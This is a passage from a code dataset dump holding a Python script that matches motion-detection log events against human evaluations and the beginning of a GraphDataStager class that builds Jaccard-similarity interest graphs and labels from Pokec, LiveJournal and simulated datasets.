video filename\n if \".avi\" in line:\n # Split the line based on file path separators and return the\n # last chunk\n video = line.split(\"/\")[-1]\n return video\n\n\ndef check_event_start(line):\n \"\"\"\n Checks if the proceeding lines will describe a new motion event.\n :param line: String of the latest line from the log file.\n :return: Boolean indicating if the proceeding lines will describe\n a new motion event.\n \"\"\"\n # Check if a new event is about to start\n if \"new motion event\" in line:\n return True\n else:\n return False\n\n\ndef get_time(line):\n \"\"\"\n If the line contains a regex match for a timestamp, process\n and return it as a datetime object.\n :param line: String of the latest line from the log file.\n :return: Datetime object from the log string.\n \"\"\"\n match = re.match(r\"^(?P\\w{3}) (?P\\w{3}) (?P\\d{1,2}) \"\n r\"(?P\\d{2}):(?P\\d{2}):(?P\\d{2}) (?P\\d{4})\", line)\n if match:\n return dt.strptime(match.group(0), \"%a %b %d %H:%M:%S %Y\")\n\n\ndef check_spurious(current_event, line):\n \"\"\"\n If the string \"motion direction:\" is present in the line, sets\n the passed MotionEvent object spurious property to False.\n :param current_event: Object describing Rana motion event.\n :param line: String of the latest line from the log file.\n :return: None\n \"\"\"\n if \"motion direction:\" in line:\n current_event.spurious = False\n\n\ndef parse_exel_file(path):\n \"\"\"\n Parses excel file describing motion events as manually evaluated by human viewers.\n :param path: Path to excel file.\n :return: Pandas Dataframe of data contained in Worksheet.\n \"\"\"\n wb = get_workbook(path)\n ws = wb[SHEET_NAME]\n\n # Convert worksheet into Pandas Dataframe\n data = ws.values\n cols = list(next(islice(data, 2, None)))\n data = list(data)\n data = (islice(r, 0, None) for r in data)\n df = pd.DataFrame(data, columns=cols)\n\n return df\n\n\ndef main(arguments):\n # Parse the logs\n motion_events = parse_log_files(arguments[\"path\"])\n\n # Convert list of MotionEvents to a dataframe\n me_df = motion_events_to_dataframe(motion_events)\n\n # Parse the excel file containing human-decided pollinator events\n df = parse_exel_file(EXCEL_PATH)\n\n # Get a dataframe of rows with matching event times\n match_df = get_match_dataframe(me_df, df)\n\n # Plot the frequency distribution of spurious events\n plot_match_df(match_df)\n\n\ndef plot_match_df(match_df):\n fig, axes = plt.subplots(figsize=(6, 4), ncols=2)\n fig.suptitle(\"Frequency of Matching Motion Events\\nBetween Rana Logs and Human Evaluation\")\n spur_count = match_df.spurious.value_counts()\n spur_count.rename({True: \"Spurious\", False: \"Non-spurious\"}, inplace=True)\n spur_pie = spur_count.plot(kind=\"pie\", ax=axes[0], autopct=lambda pct: comp_perc(pct, spur_count.values))\n spur_pie.set_ylabel(\"\")\n spur_pie.set_title(\"Total\")\n group_count = match_df.groupby(match_df.index).spurious.value_counts()\n group_count.rename({True: \"Spurious\", False: \"Non-spurious\"}, inplace=True)\n group_pie = group_count.plot(kind=\"pie\", ax=axes[1], labels=None,\n autopct=lambda pct: comp_perc(pct, spur_count.values))\n group_pie.set_ylabel(\"\")\n group_pie.set_title(\"Grouped By Video\")\n group_pie.legend(labels=group_count.index, bbox_to_anchor=(0.35, 0.3), loc=\"upper left\", fontsize=10,\n bbox_transform=plt.gcf().transFigure)\n plt.show()\n\n\ndef parse_log_files(log_path):\n # Create a list to hold all motion event objects\n motion_events = []\n video = None\n current_event = None\n time = None\n for line in handle_file(log_path):\n video = check_video(line) or video\n\n # If we don't yet know the video name, we can skip ahead\n if not video:\n continue\n\n latest_time = get_time(line)\n if latest_time:\n time = latest_time\n\n if current_event:\n # If this is the first time stamp since a new motion event,\n # set the latest time as the event start time\n if current_event.start_time is None:\n current_event.start_time = time\n\n # Check if the line contains text to indicate the motion\n # event is non-spurious\n check_spurious(current_event, line)\n else:\n # Check if the line indicates a new motion event\n # has occurred\n new_event = check_event_start(line)\n if new_event:\n # Check if we already have a current event\n if current_event:\n # A new event is beginning so wrap up the current\n # event\n current_event.end_time = time\n\n # Create a new event object and add it to list of\n # events\n current_event = MotionEvent(video)\n motion_events.append(current_event)\n # Add end time for final motion event\n if current_event and current_event.end_time is None:\n current_event.end_time = time\n\n return motion_events\n\n\ndef handle_file(file_path, strip=True):\n \"\"\"\n Open the log file and yield each line back.\n :param file_path: Path to Rana log file.\n :param strip: Boolean indicated if newline characters should be\n stripped from each line before returning. Defaults to True.\n :return: String of text from log file.\n \"\"\"\n with open(file_path) as f:\n for line in f.readlines():\n if strip:\n # Remove newline characters\n line = line.rstrip()\n yield line\n\n\nif __name__ == \"__main__\":\n # Construct the argument parser and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-p\", \"--path\", required=True,\n help=\"base path to Rana log files\")\n args = vars(ap.parse_args())\n main(args)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"564195764","text":"#!/usr/bin/env python3\nfrom collections import defaultdict\nimport itertools\nimport json\nimport math\nimport os\nfrom random import Random\nfrom timeit import default_timer\nfrom urllib.parse import quote_plus\n\nfrom dataReadWrite.ReadWriteAll import ALGORITHMS\nfrom graphDataAnalysis.GraphDataStagerException import GraphDataStagerException\nfrom graphDataAnalysis.GraphLabels import GraphLabels\nfrom lib import comb, IntToStrDict, reverse_dict\n\nALGO_NAMES = set(ALGORITHMS.keys()) | {\"autohds-g\"} # set for nice repr\n\n\nclass GraphDataStager:\n\n DATA_NAMES = {\n \"pokec\": {\n \"max_interest_len\": 20,\n \"min_interest_occurrence\": 2,\n \"label_inject_fraction\": 0.5, # percentage that is injected into graph\n \"data_alpha\": 0.0,\n \"sum_edges\": True,\n \"k_regularization\": 2,\n \"save_autoHDS-G_native_format\": False,\n \"interests_file_name\": \"soc-pokec-profiles.txt\",\n \"network_file_name\": \"soc-pokec-relationships.txt\"\n },\n \"livejournal\": {\n \"min_interest_occurrence\": 500,\n \"label_inject_fraction\": 0.5, # percentage that is injected into graph\n \"data_alpha\": 0.0,\n \"sum_edges\": True,\n \"k_regularization\": 2,\n \"save_autoHDS-G_native_format\": False,\n \"interests_file_name\": \"com-lj.all.cmty.txt\",\n \"network_file_name\": \"com-lj.ungraph.txt\"\n },\n \"sim2_partitional\": {\n \"save_autoHDS-G_native_format\": True\n },\n \"sim2_edge\": {\n \"num_edge_labels\": False, # False for exhaustive, else int\n \"save_autoHDS-G_native_format\": True\n },\n \"socialbot\": {\n \"save_autoHDS-G_native_format\": False\n }\n }\n\n COMMUNITY_DATA_SETS = {\"pokec\", \"livejournal\"} # todo: check if thats the right way to do it\n\n def __init__(self, staging_dir, data_name, experiment_name, seed, num_points_sample,\n sim_threshold, max_edges, debug, label_inject_fraction):\n\n # must be in valid data names\n if data_name not in GraphDataStager.DATA_NAMES:\n raise GraphDataStagerException(\"Valid data set names: {}, received: {}\"\n .format(set(GraphDataStager.DATA_NAMES.keys()), data_name))\n\n if data_name in GraphDataStager.COMMUNITY_DATA_SETS:\n self.generate_method = \"_generate_graph_and_labels_communities\"\n else:\n self.generate_method = \"_generate_graph_and_labels_\" + data_name\n\n # check if the method exists for that data name\n if hasattr(GraphDataStager, self.generate_method) and callable(getattr(GraphDataStager, self.generate_method)):\n print(\"Found method: {} for datasets {}\"\n .format(self.generate_method, data_name))\n else:\n raise GraphDataStagerException(\n \"Could not find a valid method {} for data name {}, please add\"\n \" in the GraphDataStager class!\"\n .format(self.generate_method, data_name)\n )\n\n # TODO: this is a hack because we had to change this very often to optimize external dataset runs\n if (label_inject_fraction is not None) and (data_name in GraphDataStager.COMMUNITY_DATA_SETS):\n if (label_inject_fraction > 1.0) or (label_inject_fraction < 0.0):\n raise GraphDataStagerException(\"Invalid label_inject_fraction passed, must be between 0 and 1. Got: {}\"\n .format(label_inject_fraction))\n self.DATA_NAMES[data_name][\"label_inject_fraction\"] = label_inject_fraction\n\n self.data_name = data_name\n self.experiment_name = experiment_name\n\n # example, pokec root dir\n self.input_data_dir = os.path.join(staging_dir, data_name)\n # input_data_dir must exist\n if not os.path.exists(self.input_data_dir):\n raise GraphDataStagerException(\"Input data dir path: {} not found!\".format(self.input_data_dir))\n\n # example, pokec/node_100k.n_1.li_0.1\n self.output_data_dir = os.path.join(self.input_data_dir, experiment_name)\n\n if not os.path.exists(self.output_data_dir):\n os.makedirs(self.output_data_dir)\n\n self.graph_file_path = os.path.join(self.output_data_dir, \"graph\")\n self.labels_file_path = os.path.join(self.output_data_dir, \"labels\")\n\n self.sim_threshold = sim_threshold\n\n if self.sim_threshold >= 0:\n print(\"Similarity threshold: {}\".format(self.sim_threshold))\n else:\n raise GraphDataStagerException(\"Similarity threshold must be >= 0! Recieved: {}\"\n .format(self.sim_threshold))\n\n self.num_points_sample = num_points_sample\n # seed values so that same data will come each time with specific seed\n self.random = Random(seed)\n self.max_edges = max_edges\n self.debug = debug\n\n # create data set dir if not already there\n\n # set of all sampled vertices given a num_points_sample\n self.all_sample_nodes = set()\n\n # measurements related code this is computed lazily\n # do not access self._node_based_graph directly\n # access this through the property self.node_based_graph\n self._node_based_graph = None # dict: node ID -> (dict: node ID -> weight)\n\n # needed for edge based labels generation\n self.edge_labels = dict() # dict: (node ID 1, node ID 2) -> weight\n\n self.partitional_labels = dict() # dict: node ID -> cluster ID\n\n # edges for the graph dataset sampled for saving\n # format: dict of (node ID, node ID) -> weight\n self.graph = dict()\n\n # set of nodes that exist in self.graph\n self.graph_nodes = set()\n\n # string -> int ID mapping\n # if this remains None, no mapping file will be written (in cases where\n # there is no string ID)\n self.node_id_mapping = None\n\n def remove_disconnected_nodes(self):\n \"\"\"\n Filters out any unconnected nodes from the graph before it is saved.\n Mutates self.graph_nodes.\n \"\"\"\n num_nodes = len(self.graph_nodes)\n self.graph_nodes.clear()\n for node_a, node_b in self.graph:\n if node_a not in self.graph_nodes:\n self.graph_nodes.add(node_a)\n if node_b not in self.graph_nodes:\n self.graph_nodes.add(node_b)\n print(\"Removed {} disconnected nodes (Negative in case of data_alpha = 0)\"\n .format(num_nodes - len(self.graph_nodes)))\n\n def save_graph(self):\n \"\"\"\n save the generic generated graph (weighted)\n \"\"\"\n edge_count = 0\n with open(self.graph_file_path, \"w\") as graph_file:\n for (node1, node2), weight in self.graph.items():\n edge_count += 1\n if edge_count % 250000 == 0:\n print(\"Saved {} edges...\".format(edge_count))\n\n graph_file.write(\"{}\\t{}\\t{}\\n\".format(node1, node2, weight))\n print(\"Saved {} edges to file: {}\".format(edge_count, self.graph_file_path))\n\n def save_edge_labels(self):\n \"\"\"\n save the generic generated graph (weighted)\n \"\"\"\n edge_count = 0\n label_nodes = set()\n with open(self.labels_file_path, \"w\") as f:\n f.write(GraphLabels.LABEL_FORMAT_HEADERS[GraphLabels.LABEL_FORMAT.EDGE_BASED] + \"\\n\")\n for edge, weight in self.edge_labels.items():\n node_1, node_2 = edge\n if node_1 not in label_nodes:\n label_nodes.add(node_1)\n if node_2 not in label_nodes:\n label_nodes.add(node_2)\n edge_count += 1\n if edge_count % 250000 == 0:\n print(\"Saved {} edges ...\".format(edge_count))\n\n f.write(\"{}\\t{}\\t{}\\n\".format(float(weight), *edge))\n print(\"Saved {} nodes {} edges to label file: {}\".format(len(label_nodes), edge_count, self.labels_file_path))\n\n # TODO: add static method for saving partitional labels to file\n\n def _sample_nodes(self, all_nodes):\n \"\"\"\n Samples nodes based on sampling etc.\n \"\"\"\n # The all_nodes variable that is being passed (label nodes) is being iterated over later in the program, so\n # it is being saved as a copy if no sampling needed\n len_all_nodes = len(all_nodes)\n if self.num_points_sample is None:\n self.all_sample_nodes = all_nodes.copy()\n self.num_points_sample = len_all_nodes\n elif len_all_nodes < self.num_points_sample:\n print(\"Warning: shrunk number of nodes from {} to keep to the \"\n \"maximum since only {} nodes were found\".format(len_all_nodes, self.num_points_sample))\n self.num_points_sample = len_all_nodes\n self.all_sample_nodes = all_nodes.copy()\n elif len_all_nodes == self.num_points_sample:\n self.all_sample_nodes = all_nodes.copy()\n else:\n # sample nodes as asked for, for speed or desired dataset size by the user\n self.all_sample_nodes = set(self.random.sample(all_nodes, self.num_points_sample))\n\n print(\"Selected {} sampled nodes of {} nodes\".format(len(self.all_sample_nodes), len_all_nodes))\n\n @staticmethod\n def _filter_by_nodes(data, filter_by_nodes):\n \"\"\"\n Useful especially when testing and only part of a graph data file is\n loaded causing labels and graphs to be inconsistent.\n :param data: a dict or a set\n :return:\n \"\"\"\n\n if isinstance(data, set):\n ret_data = set()\n for node in data:\n if node in filter_by_nodes:\n ret_data.add(node)\n elif isinstance(data, dict):\n ret_data = dict()\n for node in data:\n if node in filter_by_nodes:\n ret_data[node] = data[node]\n else:\n raise GraphDataStagerException(\"Unsupported type for filtering: {}\".format(type(data)))\n\n print(\"Filtered down to {} entries from {}...\".format(len(ret_data), len(data)))\n return ret_data\n\n def generate_graph_and_labels(self):\n \"\"\"\n Wrapper that routes the call to the right hook for the dataset\n \"\"\"\n getattr(self, self.generate_method)()\n\n def _generate_sim2_graph(self):\n \"\"\"\n Loads the sim2 graph dataset removes any duplicates while loading by\n assuming graph is symmetrical.\n :return:\n \"\"\"\n\n # pass 1 get graph nodes\n all_nodes = set()\n with open(os.path.join(self.input_data_dir, \"graph.jsonl\")) as f:\n for line in f:\n node_id = json.loads(line)[\"id\"]\n all_nodes.add(node_id)\n\n self._sample_nodes(all_nodes)\n\n edges_processed = set()\n self.graph.clear()\n self.graph_nodes.clear()\n\n # pass 2 load the graph filter to sampled nodes\n with open(os.path.join(self.input_data_dir, \"graph.jsonl\")) as f:\n for line in f:\n line_dict = json.loads(line)\n node_id1 = line_dict[\"id\"]\n\n if node_id1 not in self.all_sample_nodes:\n continue\n\n for node_id2, weight in line_dict[\"connections\"]:\n if node_id2 not in self.all_sample_nodes:\n continue\n\n if node_id1 not in self.graph_nodes:\n self.graph_nodes.add(node_id1)\n if node_id2 not in self.graph_nodes:\n self.graph_nodes.add(node_id2)\n\n if node_id1 > node_id2:\n edge_id = (node_id2, node_id1)\n else:\n edge_id = (node_id1, node_id2)\n\n if edge_id in edges_processed:\n continue\n edges_processed.add(edge_id)\n self.graph[edge_id] = weight\n\n def _load_sim2_labels(self):\n labels = dict() # node ID -> cluster ID\n with open(os.path.join(self.input_data_dir, \"labels_background.clusters.jsonl\")) as f:\n for line in map(str.strip, f):\n if not line:\n continue\n\n line_dict = json.loads(line)\n node_id = line_dict[\"id\"]\n cluster_id = line_dict[\"label\"]\n level = line_dict[\"level\"]\n\n if level != 0:\n raise GraphDataStagerException(\"multi-level labels are not supported\")\n\n labels[node_id] = cluster_id\n\n return labels\n\n def _generate_graph_and_labels_sim2_partitional(self):\n \"\"\"\n development dataset sim2 with partitional labels\n :return:\n \"\"\"\n\n # graph\n self._generate_sim2_graph()\n # labels\n self.partitional_labels = self._load_sim2_labels()\n\n self.save_graph()\n\n with open(self.labels_file_path, \"w\") as f:\n f.write(GraphLabels.LABEL_FORMAT_HEADERS[GraphLabels.LABEL_FORMAT.CLUSTER_BASED] + \"\\n\")\n for node_id, cluster_id in self.partitional_labels.items():\n f.write(\"{}\\t{}\\n\".format(node_id, cluster_id))\n\n def _generate_graph_and_labels_sim2_edge(self):\n \"\"\"\n development dataset sim2 with edge-based labels\n :return:\n \"\"\"\n # graph\n self._generate_sim2_graph()\n # labels\n labels = self._load_sim2_labels()\n\n edge_labels = dict()\n\n if GraphDataStager.DATA_NAMES[\"sim2_edge\"][\"num_edge_labels\"] is False:\n # exhaustive labels\n\n sorted_graph_nodes = sorted(self.graph_nodes)\n\n for edge in itertools.combinations(sorted_graph_nodes, 2):\n # itertools.combinations of sorted list gives sorted tuples\n\n label_1 = labels[edge[0]]\n label_2 = labels[edge[1]]\n\n if label_1 == \"b\" or label_2 == \"b\":\n edge_labels[edge] = 0\n else:\n edge_labels[edge] = label_1 == label_2\n\n else:\n while len(edge_labels) < GraphDataStager.DATA_NAMES[\"sim2_edge\"][\"num_edge_labels\"]:\n\n if not len(edge_labels) % 10000 and len(edge_labels):\n print(\" {:,} of {:,} labels generated\".format(len(edge_labels), GraphDataStager.DATA_NAMES[\"sim2_edge\"][\"num_edge_labels\"]))\n\n node_id_1, node_id_2 = self.random.sample(self.graph_nodes, 2)\n\n if node_id_1 < node_id_2:\n edge = (node_id_1, node_id_2)\n else:\n edge = (node_id_2, node_id_1)\n\n if edge in edge_labels:\n continue\n\n label_1 = labels[node_id_1]\n label_2 = labels[node_id_2]\n\n if label_1 == \"b\" or label_2 == \"b\":\n edge_labels[edge] = 0\n else:\n edge_labels[edge] = label_1 == label_2\n\n self.edge_labels = edge_labels\n\n self.save_graph()\n self.save_edge_labels()\n\n def _load_community_interest_data(self):\n\n print(\"##### Loading community interest data for: {}\".format(self.data_name))\n start_time = default_timer()\n\n community_interests_path = os.path.join(self.input_data_dir, GraphDataStager.DATA_NAMES[self.data_name][\"interests_file_name\"])\n graph_index = dict() # node_id -> interest_set\n node_count = 0\n uniq_interests = defaultdict(int)\n frequent_interests = 0\n total_interests = 0\n min_freq = GraphDataStager.DATA_NAMES[self.data_name][\"min_interest_occurrence\"]\n\n if self.data_name not in GraphDataStager.DATA_NAMES:\n raise NotImplementedError(\"community dataset not implemented: {}\".format(self.data_name))\n\n with open(community_interests_path, \"r\") as interests_file:\n if self.data_name == \"pokec\":\n for line in interests_file:\n\n node_count += 1\n if node_count % 100000 == 0:\n print(\"Found {} of {} nodes with interests...\".format(len(graph_index), node_count))\n\n if self.debug:\n print(\"Stopping loading for testing. debug mode is ON!\")\n break\n\n # Read pokec user node interests. Used to build the interests graph.\n # For each row, the second value is the user ID (node) and the\n # 12th value is the list of interests, comma delimited.\n # Some lines do not have data and some don't have data for interests.\n row_cols = line.split(\"\\t\")\n if len(row_cols) < 12:\n continue\n interests = row_cols[11].split(\", \")\n if len(interests) == 0:\n continue\n # prune empty interests\n interest_set = set()\n for interest in interests:\n if (len(interest.strip()) > 0) and (interest != \"null\") \\\n and (len(interest) < GraphDataStager.DATA_NAMES[self.data_name][\"max_interest_len\"]):\n interest_set.add(interest)\n total_interests += 1\n interest_set.add(interest)\n if len(interest_set) == 0:\n # interest_set is empty\n continue\n\n node_id = int(row_cols[0])\n\n graph_index[node_id] = interest_set\n\n # count interests with enough node frequency\n for interest, freq in uniq_interests.items():\n if freq >= min_freq:\n frequent_interests += 1\n\n elif self.data_name == \"livejournal\":\n # Load LiveJournal User Group Data (Used to Generate Data Graph)\n # Will generate a dict of user -> groups (graph_index) TODO: better name\n # Will generate a list of nodes with at least 2 groups (user_group_data_nodes)\n\n interest_id = 0\n\n for line in interests_file:\n interest_id += 1\n # the format nodes in a group joined by \\t\n nodes = {int(node) for node in line.split(\"\\t\")}\n if interest_id % 100000 == 0:\n print(\"Found {} nodes in {} interests with freq > {}...\"\n .format(len(graph_index), frequent_interests, min_freq))\n if self.debug:\n print(\"Stopping loading for testing. debug mode is ON!\")\n break\n\n total_interests += 1\n if len(nodes) < min_freq:\n continue\n\n frequent_interests += 1\n\n for node in nodes:\n if node not in graph_index:\n graph_index[node] = set()\n # converting the id to string allows us to use the same pipeline as pokec\n graph_index[node].add(str(interest_id))\n else:\n raise NotImplementedError(\"community dataset not implemented: {}\".format(self.data_name))\n\n # todo: fix print, gives 0 for both\n print(\"Done loading community interest data. Found {} unique interests, {} interests occuring with \"\n \"freq >= {}, (time={:.3f} s)\"\n .format(len(uniq_interests), frequent_interests, min_freq, default_timer() - start_time))\n print(\"Found {} nodes with interests before sampling.\".format(len(graph_index)))\n\n return graph_index\n\n def _generate_graph_and_labels_communities(self):\n \"\"\"\n * saves graph file to self.output_data_dir/graph\n * generates self.graph\n * generates self.graph_nodes\n * may generate self.node_id_mapping (depending on the data set)\n * Generates the labels file\n \"\"\"\n community_interests_path_cleaned = os.path.join(self.output_data_dir, \"profiles.cleaned.txt\")\n\n interest_graph_index = self._load_community_interest_data()\n community_networks_path = os.path.join(self.input_data_dir, GraphDataStager.DATA_NAMES[self.data_name][\"network_file_name\"])\n # load network graph to get set of nodes\n start_time = default_timer()\n\n print(\"##### Loading community network graph data (1) and getting nodes for: {}\".format(self.data_name))\n network_nodes = set()\n edge_count = 0\n with open(community_networks_path, \"r\") as graph_file:\n\n if self.data_name == \"livejournal\":\n # discard 4 header lines exclusive to livejournal\n for _ in range(4):\n next(graph_file)\n\n for edge in graph_file: # edge is \"[node1]\\t[node2]\"\n edge_count += 1\n if edge_count % 2500000 == 0:\n print(\"Found {} edges of network graph...\".format(edge_count))\n\n if self.debug:\n print(\"Stopping loading for testing. debug mode is ON!\")\n break\n\n # update nodes_in_graph with the two nodes in this edge\n node_1, node_2 = edge.split(\"\\t\")\n network_nodes.add(int(node_1))\n network_nodes.add(int(node_2))\n\n print(\"Done. (time={:.3f} s)\".format(default_timer() - start_time))\n print(\"Found {} nodes in network graph\".format(len(network_nodes)))\n\n intersecting_nodes = network_nodes.intersection(set(interest_graph_index.keys()))\n network_nodes = self._filter_by_nodes(network_nodes, intersecting_nodes)\n\n # For counting full size of interest graph before intersection, comment\n # next line and look at estimated graph size\n interest_graph_index = self._filter_by_nodes(interest_graph_index, intersecting_nodes)\n\n self._sample_nodes(network_nodes)\n\n # This is not the case, but check just to make sure to remove nodes not\n # in both network graph and interest graph.\n if len(network_nodes) != len(interest_graph_index):\n raise GraphDataStagerException(\"community data interests graph vs network graph have different nodes, \"\n \"need cleaning by removing extra ones in both\")\n\n # The math shows that if you are regularizing as N/(D+R) where R is reg\n # and N and D are # of shared tokens between posts vs total no.\n # token between them, then this is the min. of tokens each posts\n # need to have in order for their jaccard to be greater than the\n # desired threshold, this allows us to prune most of the pairs\n # (pre-filter)\n MIN_INTERESTS_NEEDED = math.ceil(self.sim_threshold * GraphDataStager.DATA_NAMES[self.data_name][\"k_regularization\"]\n / (1. - self.sim_threshold))\n\n # Populate node_id_mapping (string -> int) with all sample nodes so it\n # has the nodes in interest graph and network graph.\n self.node_id_mapping = dict()\n for node in self.all_sample_nodes:\n interests = interest_graph_index[node]\n # This allows us to view interests in geneDIVER.\n # Make interests shorter (for the ptDescription) to avoid long\n # interests when viewing URLs.\n str_node_id = \"{}:https://www.google.com/search?q={}\".format(\n node,\n quote_plus(\",\".join(interest[:5] for interest in sorted(interests)))\n )\n self.node_id_mapping[str_node_id] = node\n\n graph_rindex = dict() # dict: interest -> set of nodes\n # prune graph index\n # build reverse index for speed\n\n # how many nodes did we add in the interest reverse index\n all_interest_nodes = set()\n for node in network_nodes:\n if node in self.all_sample_nodes:\n # If this node doesn't have enough interests, it will never have\n # enough similarity (self.sim_threshold) due to\n # regularization with any node, so do not add to node\n # sample set and reverse index.\n if len(interest_graph_index[node]) < MIN_INTERESTS_NEEDED: # TODO: why isn't this being done before sampling\n self.all_sample_nodes.remove(node) # TODO: changed this\n del interest_graph_index[node]\n else:\n # Only add if sampled and meets MIN_TERMS_NEEDED\n for interest in interest_graph_index[node]:\n if interest not in graph_rindex:\n graph_rindex[interest] = set()\n graph_rindex[interest].add(node)\n if node not in all_interest_nodes:\n all_interest_nodes.add(node)\n else:\n del interest_graph_index[node]\n del network_nodes\n\n # Prune out all interests that don't connect at least min_interest_occurrence people as it is just dead noise.\n print(\"Pruning out interests that are occurring less than {} times, also \"\n \"pruning out nodes that have only that interest...\"\n .format(GraphDataStager.DATA_NAMES[self.data_name][\"min_interest_occurrence\"]))\n\n interest_prune_list = list()\n for interest in graph_rindex:\n if len(graph_rindex[interest]) < GraphDataStager.DATA_NAMES[self.data_name][\"min_interest_occurrence\"]:\n interest_prune_list.append(interest)\n for interest in interest_prune_list:\n for node in graph_rindex[interest]:\n interest_graph_index[node].remove(interest)\n if len(interest_graph_index[node]) == 0:\n del interest_graph_index[node]\n self.all_sample_nodes.remove(node)\n del graph_rindex[interest]\n\n print(\"Pruned to {} nodes, removed {} low frequency interests, left with {} unique interests\"\n .format(len(self.all_sample_nodes), len(interest_prune_list), len(graph_rindex)))\n print(\"Saving pruned interests in: {}\".format(community_interests_path_cleaned))\n with open(community_interests_path_cleaned, \"w\") as pcf:\n for node_id in interest_graph_index.keys():\n interest_list = \",\".join(sorted(interest_graph_index[node_id]))\n pcf.write(\"{}\\t{}\\n\".format(node_id, interest_list))\n\n # Save sample filtered network graph to staging dir.\n print(\"##### Loading community network data (2) and saving network graphe for sampled nodes.\")\n start_time = default_timer()\n edge_count = 0\n network_edge_count = 0\n edge_labels_nodes = set()\n\n with open(community_networks_path, \"r\") as graph_file:\n\n if self.data_name == \"livejournal\":\n # discard 4 header lines exclusive to livejournal\n for i in range(4):\n next(graph_file)\n\n for edge in map(str.strip, graph_file): # edge is \"[node1]\\t[node2]\"\n edge_count += 1\n if edge_count % 2500000 == 0:\n print(\"Found {} edges of network graph...\".format(edge_count))\n\n if self.debug:\n print(\"Stopping loading for testing. debug mode is ON!\")\n break\n\n # Update nodes_in_graph with the two nodes in this edge.\n node1, node2 = map(int, edge.split(\"\\t\"))\n\n # Filter out any node NOT in sample node set.\n if (node1 not in self.all_sample_nodes) or (node2 not in self.all_sample_nodes):\n continue\n\n if node1 > node2:\n edge_id = (node2, node1)\n else:\n edge_id = (node1, node2)\n\n self.edge_labels[edge_id] = 1\n if node1 not in edge_labels_nodes:\n edge_labels_nodes.add(node1)\n if node2 not in edge_labels_nodes:\n edge_labels_nodes.add(node2)\n network_edge_count += 1\n\n print(\"Done. (time={:.3f} s), saved {} edges to community graph\".format(default_timer() - start_time, network_edge_count))\n\n # load/generate graph into memory for algorithm to use later\n print(\"##### Generate interest graph with interest_graph_index and graph_rindex\")\n start_time = default_timer()\n\n # tracks edges already calculated in the filter-set of reverse index so as not to avoid duplicates\n edges_processed = set()\n self.graph.clear()\n saved_count = 0\n\n print(\"No. of nodes in graph ridx: {}\".format(len(all_interest_nodes)))\n nodes_found_in_ridx= set()\n # iterate over possible edges\n if GraphDataStager.DATA_NAMES[self.data_name][\"data_alpha\"] > 0:\n for interest, nodes in graph_rindex.items():\n for node_a, node_b in itertools.combinations(nodes, 2):\n if node_a not in nodes_found_in_ridx:\n nodes_found_in_ridx.add(node_a)\n if node_b not in nodes_found_in_ridx:\n nodes_found_in_ridx.add(node_b)\n\n # create sorted edge id to make sure (a, b) and (b, a) are deduped\n if node_a > node_b:\n edge_id = (node_b, node_a)\n else:\n edge_id = (node_a, node_b)\n\n if edge_id in edges_processed:\n continue\n edges_processed.add(edge_id)\n interests_a = interest_graph_index[node_a]\n interests_b = interest_graph_index[node_b]\n numerator = len(interests_a & interests_b)\n\n # if no. of shared interests is not >= MIN_TERMS_NEEDED this jaccard is going to be too small\n # skip denominator calc\n if numerator < MIN_INTERESTS_NEEDED:\n continue\n edge_jaccard = numerator / (len(interests_a | interests_b) +\n GraphDataStager.DATA_NAMES[self.data_name][\"k_regularization\"])\n if edge_jaccard < self.sim_threshold:\n continue\n\n self.graph[edge_id] = edge_jaccard\n # graph_nodes is a subset of all nodes in the graph.\n # Nodes not having a high enough jaccard with any other\n # node are going to be missing but they are present in\n # self.all_sample_nodes\n self.graph_nodes.add(node_a)\n self.graph_nodes.add(node_b)\n\n num_current_graph_nodes = len(self.graph_nodes)\n if saved_count % 100000 == 0:\n # Won't run on 0 because there will always be at least\n # 2 nodes.\n\n # edge_density is equal to ratio between the edges and\n # total amount of edges possible from the current\n # graph nodes.\n edge_density = saved_count / (num_current_graph_nodes * (num_current_graph_nodes - 1) // 2)\n\n # Number of edges expected by multiplying total amount\n # of edges possible from self.num_points_sample\n # Uses len(self.all_sample_nodes) instead of\n # self.num_sample because pruning removes almost\n # 40% of self.num_sample\n expected_number_of_edges = comb(len(all_interest_nodes), 2) * edge_density\n\n if expected_number_of_edges > self.max_edges * 1.25:\n raise GraphDataStagerException(\n \"Edges expected significantly higher than \"\n \"max_edges passed. Stopping program. \"\n \"Expected_number of edges {}, max edges \"\n \"allowed {}, edge_density: {}\"\n .format(expected_number_of_edges, self.max_edges, edge_density)\n )\n\n saved_count += 1\n\n # Modulo progress print\n if saved_count % 50000 == 0:\n print(\" Saved {} edges in {:.2f} seconds...\"\n .format(saved_count, default_timer() - start_time))\n print(\" Expected number of edges right now is {}\"\n .format(expected_number_of_edges))\n print(\"Found {} nodes in ridx so far, can have: {}\"\n .format(len(nodes_found_in_ridx), len(all_interest_nodes)))\n else:\n print(\"Skipping data jaccard graph computation as data_alpha weight is 0!\")\n print(\"Done. (time={:.3f} s), Produced {} edges for interests graph in memory\"\n .format(default_timer() - start_time, saved_count))\n\n # inject a fraction of the labels into graph\n print(\"#################### Injecting labels into graph with fraction of: {}\"\n .format(GraphDataStager.DATA_NAMES[self.data_name][\"label_inject_fraction\"]))\n\n sparse_injected_labels_jaccard_sum = 0 # combined jaccard of all injected labels that are also in the data graph\n all_injected_edges_count = 0 # total number of injected labels\n sparse_injected_edges_count = 0 # number of injected labels that are also in the data graph\n label_similarities_file_path = os.path.join(self.output_data_dir, \"label_similarities.tsv\")\n\n combined_graph_edges = set(self.edge_labels.keys())\n combined_graph_edges.update(self.graph.keys())\n num_combined_edges = len(combined_graph_edges)\n num_edges_saved = 0\n num_edges_processed = 0\n ticker_size = num_combined_edges // 10\n nodes_interesected_graph = set()\n\n with open(label_similarities_file_path, \"w\") as label_similarities_file:\n\n for edge_id in combined_graph_edges:\n num_edges_processed += 1\n\n if (num_edges_saved > 10) and (num_edges_processed % ticker_size == 0):\n fraction_edges_saved = num_edges_saved / num_edges_processed\n expected_num_edges = int(fraction_edges_saved * num_combined_edges)\n num_nodes = len(self.graph_nodes)\n edge_density_saved = num_edges_saved / (num_nodes * (num_nodes - 1) // 2)\n expected_dense_edges = expected_num_edges / edge_density_saved\n # general quadratic solution for number of nodes given number of edges in a dense graph:\n # num nodes = (1 + sqrt(1 + 8 * all_edges)) / 2\n expected_num_nodes = int((1 + (1 + 8 * expected_dense_edges)**0.5) / 2)\n\n print(\"Expected final size of graph: nodes: {}, edges:{}, if this is not what \"\n \"you want 